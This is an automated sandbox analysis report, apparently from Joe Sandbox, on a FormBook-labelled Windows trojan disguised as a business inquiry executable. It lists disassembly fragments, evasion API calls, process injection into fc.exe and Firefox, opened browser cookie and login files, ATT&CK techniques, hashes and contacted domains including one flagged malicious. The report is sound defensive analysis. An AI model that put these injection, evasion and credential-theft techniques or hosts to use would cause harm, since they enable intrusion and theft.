              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015D4500 mov eax, dword ptr fs:[00000030h]0_2_015D4500
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01510535 mov eax, dword ptr fs:[00000030h]0_2_01510535
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01510535 mov eax, dword ptr fs:[00000030h]0_2_01510535
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01510535 mov eax, dword ptr fs:[00000030h]0_2_01510535
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01510535 mov eax, dword ptr fs:[00000030h]0_2_01510535
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01510535 mov eax, dword ptr fs:[00000030h]0_2_01510535
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01510535 mov eax, dword ptr fs:[00000030h]0_2_01510535
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152E53E mov eax, dword ptr fs:[00000030h]0_2_0152E53E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152E53E mov eax, dword ptr fs:[00000030h]0_2_0152E53E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152E53E mov eax, dword ptr fs:[00000030h]0_2_0152E53E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152E53E mov eax, dword ptr fs:[00000030h]0_2_0152E53E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152E53E mov eax, dword ptr fs:[00000030h]0_2_0152E53E
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015065D0 mov eax, dword ptr fs:[00000030h]0_2_015065D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153A5D0 mov eax, dword ptr fs:[00000030h]0_2_0153A5D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153A5D0 mov eax, dword ptr fs:[00000030h]0_2_0153A5D0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153E5CF mov eax, dword ptr fs:[00000030h]0_2_0153E5CF
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153E5CF mov eax, dword ptr fs:[00000030h]0_2_0153E5CF
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015025E0 mov eax, dword ptr fs:[00000030h]0_2_015025E0
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153C5ED mov eax, dword ptr fs:[00000030h]0_2_0153C5ED
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153C5ED mov eax, dword ptr fs:[00000030h]0_2_0153C5ED
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153E59C mov eax, dword ptr fs:[00000030h]0_2_0153E59C
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01502582 mov eax, dword ptr fs:[00000030h]0_2_01502582
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01502582 mov ecx, dword ptr fs:[00000030h]0_2_01502582
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01534588 mov eax, dword ptr fs:[00000030h]0_2_01534588
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015245B1 mov eax, dword ptr fs:[00000030h]0_2_015245B1
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015245B1 mov eax, dword ptr fs:[00000030h]0_2_015245B1
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015805A7 mov eax, dword ptr fs:[00000030h]0_2_015805A7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015805A7 mov eax, dword ptr fs:[00000030h]0_2_015805A7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015805A7 mov eax, dword ptr fs:[00000030h]0_2_015805A7
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152245A mov eax, dword ptr fs:[00000030h]0_2_0152245A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015BA456 mov eax, dword ptr fs:[00000030h]0_2_015BA456
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153E443 mov eax, dword ptr fs:[00000030h]0_2_0153E443
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014F645D mov eax, dword ptr fs:[00000030h]0_2_014F645D
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152A470 mov eax, dword ptr fs:[00000030h]0_2_0152A470
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152A470 mov eax, dword ptr fs:[00000030h]0_2_0152A470
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0152A470 mov eax, dword ptr fs:[00000030h]0_2_0152A470
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0158C460 mov ecx, dword ptr fs:[00000030h]0_2_0158C460
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01538402 mov eax, dword ptr fs:[00000030h]0_2_01538402
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01538402 mov eax, dword ptr fs:[00000030h]0_2_01538402
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01538402 mov eax, dword ptr fs:[00000030h]0_2_01538402
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_0153A430 mov eax, dword ptr fs:[00000030h]0_2_0153A430
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FC427 mov eax, dword ptr fs:[00000030h]0_2_014FC427
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FE420 mov eax, dword ptr fs:[00000030h]0_2_014FE420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FE420 mov eax, dword ptr fs:[00000030h]0_2_014FE420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_014FE420 mov eax, dword ptr fs:[00000030h]0_2_014FE420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_01586420 mov eax, dword ptr fs:[00000030h]0_2_01586420
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015004E5 mov ecx, dword ptr fs:[00000030h]0_2_015004E5
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015BA49A mov eax, dword ptr fs:[00000030h]0_2_015BA49A
              Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exeCode function: 0_2_015344B0 mov ecx, dword ptr fs:[00000030h]0_2_015344B0

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
• NtWriteVirtualMemory: Direct from: 0x77762E3C
• NtMapViewOfSection: Direct from: 0x77762D1C
• NtNotifyChangeKey: Direct from: 0x77763C2C
• NtCreateMutant: Direct from: 0x777635CC
• NtResumeThread: Direct from: 0x777636AC
• NtProtectVirtualMemory: Direct from: 0x77757B2E
• NtQuerySystemInformation: Direct from: 0x77762DFC
• NtAllocateVirtualMemory: Direct from: 0x77762BFC
• NtReadFile: Direct from: 0x77762ADC
• NtDelayExecution: Direct from: 0x77762DDC
• NtWriteVirtualMemory: Direct from: 0x7776490C
• NtQueryInformationProcess: Direct from: 0x77762C26
• NtResumeThread: Direct from: 0x77762FBC
• NtCreateUserProcess: Direct from: 0x7776371C
• NtSetInformationThread: Direct from: 0x777563F9
• NtAllocateVirtualMemory: Direct from: 0x77763C9C
• NtSetInformationThread: Direct from: 0x77762B4C
• NtQueryAttributesFile: Direct from: 0x77762E6C
• NtClose: Direct from: 0x77762B6C
• NtReadVirtualMemory: Direct from: 0x77762E8C
• NtCreateKey: Direct from: 0x77762C6C
• NtQuerySystemInformation: Direct from: 0x777648CC
• NtAllocateVirtualMemory: Direct from: 0x777648EC
• NtQueryVolumeInformationFile: Direct from: 0x77762F2C
• NtOpenSection: Direct from: 0x77762E0C
• NtDeviceIoControlFile: Direct from: 0x77762AEC
• NtAllocateVirtualMemory: Direct from: 0x77762BEC
• NtQueryInformationToken: Direct from: 0x77762CAC
• NtTerminateThread: Direct from: 0x77762FCC
• NtCreateFile: Direct from: 0x77762FEC
• NtOpenFile: Direct from: 0x77762DCC
• NtOpenKeyEx: Direct from: 0x77762B9C
• NtSetInformationProcess: Direct from: 0x77762C5C
• NtProtectVirtualMemory: Direct from: 0x77762F9C
Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe | Section loaded: NULL target: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe protection: execute and read and write
Source: C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe | Section loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\fc.exe | Section loaded: NULL target: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe protection: read write
Source: C:\Windows\SysWOW64\fc.exe | Section loaded: NULL target: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\fc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\fc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\fc.exe | Thread register set: target process: 2040
Source: C:\Windows\SysWOW64\fc.exe | Thread APC queued: target process: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
Source: C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe | Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
Source: C:\Windows\SysWOW64\fc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: mSWyWMUGFWJCYT.exe, 00000009.00000002.2507379425.0000000001751000.00000002.00000001.00040000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 00000009.00000000.1587239579.0000000001751000.00000002.00000001.00040000.00000000.sdmp, mSWyWMUGFWJCYT.exe, 0000000B.00000002.2507591280.00000000018B1000.00000002.00000001.00040000.00000000.sdmp
• Binary or memory string: Shell_TrayWnd
• Binary or memory string: Progman
• Binary or memory string: ?Program Manager
• Binary or memory string: Progmanlock

              Stealing of Sensitive Information

Source: Yara match
• File source: 0.2.CSZ inquiry for MH raw material.exe.e60000.0.unpack, type: UNPACKEDPE
• File source: 0000000A.00000002.2505508827.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
• File source: 0000000B.00000002.2509922951.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
• File source: 0000000A.00000002.2504926024.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
• File source: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
• File source: 0000000A.00000002.2505700544.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
• File source: 00000000.00000002.1663788155.0000000001190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
• File source: 00000009.00000002.2508299421.0000000003880000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
• File source: 00000000.00000002.1664457241.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\fc.exe
• File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
• File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
• File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
• File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
• File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
• File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
• File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
• File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
• Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

              Remote Access Functionality

Source: Yara match
• File source: 0.2.CSZ inquiry for MH raw material.exe.e60000.0.unpack, type: UNPACKEDPE
• File source: 0000000A.00000002.2505508827.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
• File source: 0000000B.00000002.2509922951.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
• File source: 0000000A.00000002.2504926024.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
• File source: 00000000.00000002.1663609109.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
• File source: 0000000A.00000002.2505700544.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
• File source: 00000000.00000002.1663788155.0000000001190000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
• File source: 00000009.00000002.2508299421.0000000003880000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
• File source: 00000000.00000002.1664457241.00000000023D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 2 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 312 Process Injection | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Abuse Elevation Control Mechanism | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 4 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Source | Detection | Scanner | Label |
|---|---|---|---|
| CSZ inquiry for MH raw material.exe | 74% | ReversingLabs | Win32.Backdoor.FormBook |
| CSZ inquiry for MH raw material.exe | 67% | Virustotal | |
| CSZ inquiry for MH raw material.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
| CSZ inquiry for MH raw material.exe | 100% | Joe Sandbox ML | |
              No Antivirus matches
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| promocao.info | 84.32.84.32 | true | true | | unknown |
| www.grimbo.boats | 104.21.18.171 | true | false | | high |
| www.lonfor.website | 199.192.21.169 | true | false | | high |
| www.gayhxi.info | 47.83.1.90 | true | false | | high |
| www.investshares.net | 154.197.162.239 | true | false | | high |
| zcdn.8383dns.com | 134.122.135.48 | true | false | | high |
| www.promocao.info | unknown | unknown | false | | unknown |
| www.44756.pizza | unknown | unknown | false | | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 154.197.162.239 | www.investshares.net | Seychelles | 133201 | COMING-ASABCDEGROUPCOMPANYLIMITEDHK | false |
| 104.21.18.171 | www.grimbo.boats | United States | 13335 | CLOUDFLARENETUS | false |
| 199.192.21.169 | www.lonfor.website | United States | 22612 | NAMECHEAP-NETUS | false |
| 47.83.1.90 | www.gayhxi.info | United States | 3209 | VODANETInternationalIP-BackboneofVodafoneDE | false |
| 84.32.84.32 | promocao.info | Lithuania | 33922 | NTT-LT-ASLT | true |
| 134.122.135.48 | zcdn.8383dns.com | United States | 64050 | BCPL-SGBGPNETGlobalASNSG | false |
                                              Joe Sandbox version:42.0.0 Malachite
                                              Analysis ID:1590081
                                              Start date and time:2025-01-13 15:10:08 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 7m 36s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:15
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:2
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:CSZ inquiry for MH raw material.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@5/1@6/6
                                              EGA Information:
                                              • Successful, ratio: 75%
                                              HCA Information:
                                              • Successful, ratio: 96%
                                              • Number of executed functions: 14
                                              • Number of non-executed functions: 329
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target mSWyWMUGFWJCYT.exe, PID 2340 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
| Time | Type | Description |
|---|---|---|
| 09:12:21 | API Interceptor | 1340613x Sleep call for process: fc.exe modified |
                                              Process:C:\Windows\SysWOW64\fc.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                              Category:modified
                                              Size (bytes):196608
                                              Entropy (8bit):1.1215420383712111
                                              Encrypted:false
                                              SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                              MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                              SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                              SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                              SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.96216415891094
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:CSZ inquiry for MH raw material.exe
                                              File size:298'496 bytes
                                              MD5:2a3034abc9b8ee8875f9cd98c388ab07
                                              SHA1:0cfe449dad046b2b0cf594841f675e9d21ecdb1d
                                              SHA256:b022e4df0d9e6c8eeea122e642708a9d13b8a7e861a4d121e0c54e80a28a1cc4
                                              SHA512:44829b1b0b603c9f429fe3dc33943125d5441f091026b856ddd8da311828de8be0e87349b5d35cf95e1a02940a98c39993002abd90184c3488cba96b4aad35e5
                                              SSDEEP:6144:C8ls/dPZs9JZY9iOKuxO9oTDFgxTFLVwkBDSiQ3ro+Z:Q/dhQJqiOKsPDOZLGeDk3r
                                              TLSH:E754221A5F25F206D1FE2973391F0B427676073DBE592F21B4992CA29990CFE5EC03A1
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L......`.................X...$...............p....@................
                                              Icon Hash:246d0d17b3315458
                                              Entrypoint:0x401580
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x60E3E289 [Tue Jul 6 04:56:41 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:6
                                              OS Version Minor:0
                                              File Version Major:6
                                              File Version Minor:0
                                              Subsystem Version Major:6
                                              Subsystem Version Minor:0
                                              Import Hash:
                                              Instruction
                                              push ebp
                                              push esp
                                              pop ebp
                                              sub esp, 00000424h
                                              push ebx
                                              push esi
                                              push edi
                                              push 0000040Ch
                                              lea eax, dword ptr [ebp-00000420h]
                                              push 00000000h
                                              push eax
                                              mov dword ptr [ebp-00000424h], 00000000h
                                              call 00007FBAD07DC6FCh
                                              add esp, 0Ch
                                              sub ecx, ecx
                                              sub edi, edi
                                              xor esi, esi
                                              mov dword ptr [ebp-14h], 00000054h
                                              mov dword ptr [ebp-10h], 00003B15h
                                              mov dword ptr [ebp-0Ch], 00001B0Dh
                                              mov dword ptr [ebp-08h], 00004BD2h
                                              push edi
                                              pop edi
                                              inc ecx
                                              push ecx
                                              pop eax
                                              and eax, 80000007h
                                              jns 00007FBAD07DAB07h
                                              dec eax
                                              or eax, FFFFFFF8h
                                              inc eax
                                              jne 00007FBAD07DAB04h
                                              add ecx, ecx
                                              cmp ecx, 00000CB4h
                                              jl 00007FBAD07DAAE7h
                                              mov ecx, 00006ACDh
                                              mov eax, 92492493h
                                              imul ecx
                                              add edx, ecx
                                              sar edx, 05h
                                              push edx
                                              pop ecx
                                              shr ecx, 1Fh
                                              add ecx, edx
                                              jne 00007FBAD07DAAEDh
                                              mov eax, 00001819h
                                              push esi
                                              pop esi
                                              push 0000001Bh
                                              pop edx
                                              mov ecx, 000000C2h
                                              cmp ecx, edx
                                              cmovl ecx, edx
                                              dec eax
                                              jne 00007FBAD07DAAFAh
                                              mov ecx, 00001F5Ah
                                              mov eax, 82082083h
                                              imul ecx
                                              add edx, ecx
                                              sar edx, 06h
                                              push edx
                                              pop ecx
                                              shr ecx, 1Fh
                                              add ecx, edx
                                              jne 00007FBAD07DAAEDh
                                              call 00007FBAD07DC95Ah
                                              mov dword ptr [ebp-5Ch], eax
                                              push esi
                                              pop esi
                                              inc edi
                                              mov eax, 55555556h
                                              imul edi
                                              Programming Language:
                                              • [C++] VS2012 build 50727
                                              • [ASM] VS2012 build 50727
                                              • [LNK] VS2012 build 50727
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x47000 | 0x2358 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
